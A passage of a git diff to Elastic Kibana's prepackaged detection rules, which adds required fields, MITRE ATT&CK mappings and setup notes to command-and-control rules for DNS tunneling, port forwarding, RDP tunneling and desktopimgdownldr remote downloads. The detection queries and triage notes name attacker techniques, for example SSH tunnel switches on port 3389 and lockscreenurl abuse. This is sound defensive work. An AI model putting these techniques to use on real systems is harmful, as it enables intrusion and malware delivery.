+ "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "acd611f3-2b93-47b3-a0a3-7723bcc46f6d", "severity": "medium", @@ -66,5 +113,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_iodine_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_linux_iodine_activity.json
similarity index 56%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_iodine_activity.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_linux_iodine_activity.json
index d092c64098648..d8402dfd0fa11 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_iodine_activity.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_linux_iodine_activity.json
@@ -18,6 +18,23 @@
 "references": [
 "https://code.kryo.se/iodine/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "041d4d41-9589-43e2-ba13-5680af75ebc2",
 "severity": "high",
@@ -25,9 +42,27 @@
 "Elastic",
 "Host",
 "Linux",
- "Threat Detection"
+ "Threat Detection",
+ "Command and Control"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1572",
+ "name": "Protocol Tunneling",
+ "reference": "https://attack.mitre.org/techniques/T1572/"
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 7
+ "version": 9
 }
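Review bot: The file is renamed from linux_iodine_activity.json to command_and_control_linux_iodine_activity.json while `rule_id` 041d4d41-9589-43e2-ba13-5680af75ebc2 is unchanged, so installed copies should upgrade in place, but anything that references the old filename (documentation links, tests that enumerate prepackaged rule files) is not touched in this hunk and should be checked. The same applies to the four ml_packetbeat_* renames that follow. The new `required_fields` list (event.category, event.type, process.name) cannot be checked against the rule's query here because the query is outside the hunk.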
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_dns_tunneling.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_dns_tunneling.json similarity index 70% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_dns_tunneling.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_dns_tunneling.json index 064088b20b872..6746b9ef45ad2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_dns_tunneling.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_dns_tunneling.json @@ -22,8 +22,26 @@ "Elastic", "Network", "Threat Detection", - "ML" + "ML", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_dns_question.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_dns_question.json similarity index 68% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_dns_question.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_dns_question.json index 2d5cb473d7061..d457172fa25b5 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_dns_question.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_dns_question.json @@ -22,8 +22,33 @@ "Elastic", "Network", "Threat Detection", - "ML" + "ML", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.004", + "name": "DNS", + "reference": "https://attack.mitre.org/techniques/T1071/004/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_urls.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_urls.json similarity index 73% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_urls.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_urls.json index 3855f35b66895..54cd3729a2347 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_urls.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_urls.json 
@@ -22,8 +22,33 @@ "Elastic", "Network", "Threat Detection", - "ML" + "ML", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_user_agent.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_user_agent.json similarity index 70% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_user_agent.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_user_agent.json index 2e2cf7eef4010..55a1663b53d4c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_user_agent.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_user_agent.json 
@@ -22,8 +22,33 @@ "Elastic", "Network", "Threat Detection", - "ML" + "ML", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_nat_traversal_port_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_nat_traversal_port_activity.json index de44bec64afea..036680ee3b276 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_nat_traversal_port_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_nat_traversal_port_activity.json @@ -17,6 +17,23 @@ "license": "Elastic License v2", "name": "IPSEC NAT Traversal Port Activity", "query": "event.category:(network or network_traffic) and network.transport:udp and destination.port:4500\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7", "severity": "low", @@ -41,5 +58,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 8 + "version": 9 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_26_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_26_activity.json index 8d7d3775c5c42..0ec73073a5d9c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_26_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_26_activity.json @@ -21,6 +21,28 @@ "https://unit42.paloaltonetworks.com/unit42-badpatch/", "https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "d7e62693-aab9-4f66-a21a-3d79ecdd603d", "severity": "low", @@ -60,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_forwarding_added_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_forwarding_added_registry.json index 9612afbc6c03d..502aa47c73d76 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_forwarding_added_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_forwarding_added_registry.json 
@@ -12,13 +12,21 @@ "language": "eql", "license": "Elastic License v2", "name": "Port Forwarding Rule Addition", - "note": "## Triage and analysis\n\n### Investigating Port Forwarding Rule Addition\n\nNetwork port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to\nany other port number, or even to a port on a remote computer.\n\nAttackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box\nto access previously unreachable systems.\n\nThis rule monitors the modifications to the `HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\` subkeys.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the target host IP address, check the connections originating from the host where the modification occurred,\nand inspect the credentials used.\n - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the Administrator is aware of the activity\nand there are justifications for this configuration.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Delete the port forwarding rule.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Port Forwarding Rule Addition\n\nNetwork port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to\nany other port number, or even to a port on a remote computer.\n\nAttackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box\nto access previously unreachable systems.\n\nThis rule monitors the modifications to the `HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\` subkeys.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the target host IP address, check the connections originating from the host where the modification occurred,\nand inspect the credentials used.\n - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity\nand there are justifications for this configuration.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Delete the port forwarding rule.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\"\n", "references": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +54,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_remote_desktop_protocol_from_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_remote_desktop_protocol_from_the_internet.json index 1896e52b0c2b5..53ead8cd51597 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_remote_desktop_protocol_from_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_remote_desktop_protocol_from_the_internet.json @@ -20,6 +20,38 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "8c1bdde8-4204-45c0-9e0c-c85ca3902488", "severity": "medium", @@ -76,5 +108,5 @@ "timeline_title": "Comprehensive Network Timeline", "timestamp_override": "event.ingested", "type": "query", - "version": 14 + "version": 15 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_tunnel_plink.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_tunnel_plink.json index b9b909f03e272..8a556813971ae 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_tunnel_plink.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_tunnel_plink.json 
@@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Desktop Tunneling Detected", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Desktop Tunneling Detected\n\nProtocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases,\nranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would\nfilter to reach their destination.\n\nAttackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP\nconnections but may be more permissive to other protocols.\n\nThis rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated\nwith tools that perform tunneling.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine network data to determine if the host communicated with external servers using the tunnel.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key\nmodification, etc. Inspect the host to learn which method was used and to determine a response for the case.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Desktop Tunneling Detected\n\nProtocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases,\nranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would\nfilter to reach their destination.\n\nAttackers may 
tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP\nconnections but may be more permissive to other protocols.\n\nThis rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated\nwith tools that perform tunneling.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine network data to determine if the host communicated with external servers using the tunnel.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key\nmodification, etc. Inspect the host to learn which method was used and to determine a response for the case.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n /* RDP port and usual SSH tunneling related switches in command line */\n process.args : \"*:3389\" and\n process.args : (\"-L\", \"-P\", \"-R\", \"-pw\", \"-ssh\")\n", "references": [ "https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_desktopimgdownldr.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_desktopimgdownldr.json index ab3e55a5822ce..8c29c36bf33ba 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_desktopimgdownldr.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_desktopimgdownldr.json 
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the\n`lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file\nfrom an internal system.\n- Retrieve the file and determine if it is malicious:\n - Identify the file type.\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the 
existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions\nif necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the\n`lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file\nfrom an internal system.\n- Retrieve the file and determine if it is malicious:\n - Identify the file type.\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions\nif necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n",
 "references": [
 "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
